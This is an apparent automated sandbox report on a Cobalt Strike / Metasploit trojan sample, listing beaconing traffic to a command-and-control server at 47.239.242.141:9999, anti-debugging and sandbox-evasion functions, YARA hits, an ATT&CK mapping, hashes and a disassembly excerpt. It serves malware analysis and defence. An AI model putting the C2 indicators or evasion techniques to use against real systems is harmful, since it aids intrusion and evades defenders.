Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54423
Source: unknown	Network traffic detected: HTTP traffic on port 54424 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54424
Source: unknown	Network traffic detected: HTTP traffic on port 54425 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54425
Source: unknown	Network traffic detected: HTTP traffic on port 54426 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54426
Source: unknown	Network traffic detected: HTTP traffic on port 54427 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54427
Source: unknown	Network traffic detected: HTTP traffic on port 54428 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54428
Source: unknown	Network traffic detected: HTTP traffic on port 54429 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54429
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54430
Source: unknown	Network traffic detected: HTTP traffic on port 54431 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54431
Source: unknown	Network traffic detected: HTTP traffic on port 54432 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54432
Source: unknown	Network traffic detected: HTTP traffic on port 54433 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54433
Source: unknown	Network traffic detected: HTTP traffic on port 54434 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54434
Source: unknown	Network traffic detected: HTTP traffic on port 54435 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54435
Source: unknown	Network traffic detected: HTTP traffic on port 54436 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54436
Source: unknown	Network traffic detected: HTTP traffic on port 54437 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54437
Source: unknown	Network traffic detected: HTTP traffic on port 54438 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54438
Source: unknown	Network traffic detected: HTTP traffic on port 54439 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54439
Source: unknown	Network traffic detected: HTTP traffic on port 54440 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 54441 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54441
Source: unknown	Network traffic detected: HTTP traffic on port 54442 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54442
Source: unknown	Network traffic detected: HTTP traffic on port 54443 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54443
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54444
Source: unknown	Network traffic detected: HTTP traffic on port 54445 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54445
Source: unknown	Network traffic detected: HTTP traffic on port 54446 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 54447 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54447
Source: unknown	Network traffic detected: HTTP traffic on port 54448 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54448
Source: unknown	Network traffic detected: HTTP traffic on port 54449 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54449
Source: unknown	Network traffic detected: HTTP traffic on port 54450 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54450
Source: unknown	Network traffic detected: HTTP traffic on port 54451 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54451
Source: unknown	Network traffic detected: HTTP traffic on port 54452 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54452
Source: unknown	Network traffic detected: HTTP traffic on port 54453 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54453
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54454
Source: unknown	Network traffic detected: HTTP traffic on port 54455 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54455

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D76BE7		0_2_03D76BE7
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D73303		0_2_03D73303

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Window / User API: threadDelayed 5464			Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Window / User API: threadDelayed 4290			Jump to behavior

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-36191

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-35716

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

API coverage: 8.1 %

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D73303

0_2_03D73303

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep count: 5464 > 30	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep time: -54640000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6524	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep count: 4290 > 30	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe TID: 6500	Thread sleep time: -42900000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D791F0 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,		0_2_03D791F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D747C9 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03D747C9

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.0000000000775000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

API call chain: ExitProcess graph end node

graph_0-35884

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D963F5 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,DebugBreak,

0_2_03D963F5

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D96BD4 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,

0_2_03D96BD4

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7A2E1 mov eax, dword ptr fs:[00000030h]	0_2_03D7A2E1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D79641 mov eax, dword ptr fs:[00000030h]	0_2_03D79641
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03978A8F mov eax, dword ptr fs:[00000030h]	0_2_03978A8F
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0397972F mov eax, dword ptr fs:[00000030h]	0_2_0397972F

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D930BC CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_03D930BC

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_0040116C
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A5C
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A60
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	0_2_00401160
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	0_2_004013C1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	0_2_004011A3
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8D2CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_03D8D2CE
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8F4F0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_03D8F4F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8949D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_03D8949D

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7B9E9 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_03D7B9E9

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7BBA5 GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_03D7BBA5

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: GetLocaleInfoA,

0_2_03D9351D

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_0040161C

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_004019A0

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D76C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_03D76C99

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D76C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_03D76C99

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: vNenBbeRFZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.vNenBbeRFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.400000.0.unpack, type: UNPACKEDPE

Yara detected Metasploit Payload

Source: Yara match

File source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7733D htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_03D7733D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7725B socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_03D7725B
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D7BFB7 socket,closesocket,htons,bind,listen,	0_2_03D7BFB7

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	112 Virtualization/Sandbox Evasion	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Process Injection	21 Access Token Manipulation	Security Account Manager	112 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	14 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
vNenBbeRFZ.exe	92%	ReversingLabs	Win32.Trojan.CobaltStrike
vNenBbeRFZ.exe	85%	Virustotal		Browse
vNenBbeRFZ.exe	100%	Avira	HEUR/AGEN.1356104
vNenBbeRFZ.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Link
47.239.242.141	17%	Virustotal	Browse
http://47.239.242.141:9999/ga.js	19%	Virustotal	Browse
http://47.239.242.141:9999/BQPy	10%	Virustotal	Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
47.239.242.141	true	17%, Virustotal, Browse	unknown
http://47.239.242.141/BQPy	true		unknown
http://47.239.242.141:9999/ga.js	true	19%, Virustotal, Browse	unknown
http://47.239.242.141:9999/BQPy	true	10%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://47.239.242.141:9999/ga.jskX	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jslu	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/BQPyHPe)	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jsl	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jsl#	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/BQPy%	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/BQPygP	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jslGX	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jslqX	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://127.0.0.1:%u/	vNenBbeRFZ.exe, 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jsSX	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jsot	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://47.239.242.141:9999/ga.jsW	vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.239.242.141	unknown	United States		20115	CHARTER-20115US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528606
Start date and time:	2024-10-08 04:18:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vNenBbeRFZ.exe renamed because original name is a hash value
Original Sample Name:	d5b1b322ca3997b573d687fdd9b4df96.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 31 Number of non-executed functions: 135
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:19:00	API Interceptor	13723324x Sleep call for process: vNenBbeRFZ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
47.239.242.141	hRjh70pZ6Q.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.239.242.141:9999/s9bO

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHARTER-20115US	cenSXPimaG.elf	Get hash	malicious	Mirai, Okiru	Browse	97.94.57.120
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	172.220.122.192
	na.elf	Get hash	malicious	Unknown	Browse	66.215.147.152
	O8scEm3rJN.exe	Get hash	malicious	Unknown	Browse	47.238.55.14
	setupa.exe	Get hash	malicious	GhostRat	Browse	47.239.116.158
	Jr77pnmOup.elf	Get hash	malicious	Mirai	Browse	71.94.21.162
	ZEjcJZcrXc.elf	Get hash	malicious	Mirai	Browse	24.178.88.151
	na.elf	Get hash	malicious	Mirai	Browse	47.26.86.21
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	66.169.57.64
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	47.6.21.109

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.299276740294974
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vNenBbeRFZ.exe
File size:	14'848 bytes
MD5:	d5b1b322ca3997b573d687fdd9b4df96
SHA1:	ece9872b58cd0bcf5ff9d555bbfb846745828d4e
SHA256:	9d9914994550a46c55c6869d3fdf223e2a71b11707cc7ea26f0ae2855b1702c7
SHA512:	4d070e5a78e38be7dc70e581188f74cbff605267867b1b0490f2a2cd703050f15548319933a97894f96a7092b59eb8272822d753c3859492c9a7a6258716f6c6
SSDEEP:	192:M3mbPYCfMcrfOIuZmvKQxtzlSIVX6NO2XMDCs2RejDMN1:zMCfrfQ6tBSIEXM+sAeUN1
TLSH:	7262D771E90378B6EA155CF049FBBBB65F33FA938DB08828CF50D8C52910B24695B209
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................".....6...............0....@..................................e........ ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x401b40, 0x401af0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f6243a15fa8eee8ee96b5e1144d461f6

Entrypoint Preview

Instruction
sub esp, 0Ch
mov dword ptr [00405394h], 00000001h
call 00007FBAE4C0EA83h
add esp, 0Ch
jmp 00007FBAE4C0E23Bh
lea esi, dword ptr [esi+00000000h]
sub esp, 0Ch
mov dword ptr [00405394h], 00000000h
call 00007FBAE4C0EA63h
add esp, 0Ch
jmp 00007FBAE4C0E21Bh
lea esi, dword ptr [esi+00000000h]
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FBAE4C0FA0Ah
test eax, eax
sete al
add esp, 1Ch
movzx eax, al
neg eax
ret
nop
nop
nop
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [esp], 00401520h
call 00007FBAE4C0E563h
leave
ret
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
nop
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
pop ebp
jmp eax
push ebp
mov edx, dword ptr [0040302Ch]
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test edx, edx
jle 00007FBAE4C0E5B3h
cmp dword ptr [00403030h], 00000000h
jle 00007FBAE4C0E5AAh
mov ecx, dword ptr [00406148h]
mov dword ptr [eax+edx], ecx
mov ecx, dword ptr [0040614Ch]
mov edx, dword ptr [00403030h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6000	0x644	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4030	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x611c	0xe0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1a44	0x1c00	2ac01251523281aa369c67cbe3460bad	False	0.5327845982142857	data	5.7053937699645845	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
